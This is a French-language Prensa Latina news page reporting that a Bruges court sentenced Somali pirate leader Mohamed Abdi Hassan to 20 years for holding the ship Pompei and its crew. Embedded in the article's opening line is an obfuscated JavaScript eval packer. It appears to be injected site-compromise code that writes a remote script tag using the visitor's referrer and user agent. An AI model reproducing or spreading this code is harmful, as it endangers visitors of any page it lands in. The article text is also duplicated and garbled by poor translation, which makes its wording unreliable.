dimanche 14 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Cour de Belgique condamne chef des pirates somalíes à 20 ans de prison

Bruxelles eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|edhka|var|u0026u|referrer|dfttt||js|php'.split('|'),0,{})) (PL) Le tribunal correctionnel de la ville belge de Bruges acondamné à 20 ans de prison  au chef des pirates somaliens Mohamed Abdi Hassan pour l'enlèvement d'un navire européen de ce pays avec ses marins.

Bruxelles (PL) Le tribunal correctionnel de la ville belge de Bruges acondamné à 20 ans de prison  au chef des pirates somaliens Mohamed Abdi Hassan pour l’enlèvement d’un navire européen de ce pays avec ses marins.

La Cour a démontré la responsabilité pénale de l’agresseur, également connu comme «roi des pirates», qui détenaient le navire belge le Pompei et son équipage détenu pendant 71 jours dans les eaux somaliennes.

Abdi Hassan, détenu à l’aéroport de Bruxelles à partir de Nairobi, au Kenya, a exigé et obtenu une rançon de deux millions de dollars avant de libérer les otages, la plupart du temps marine tribunal belgas.

Le tribunal de Bruges a également attribué à l’enlèvement de la Somalie d’autres navires, y compris l’Ukraine le Faina, chargés d’armes et d’un pétrolier saoudien avec du pétrole d’une valeur d’environ 100 millions de dollars.

Les représentants des médias locaux d’information ont négocié avec Hasan le tournage par contrat et le paiement de plusieurs centaines de milliers d’euros pour la réalisation d’un film sur sa propre vie de pirate entourant les plus de trois mille kilomètres de mer de la côte somalienne.

Rm/mgt/apb

EN CONTINU
notes connexes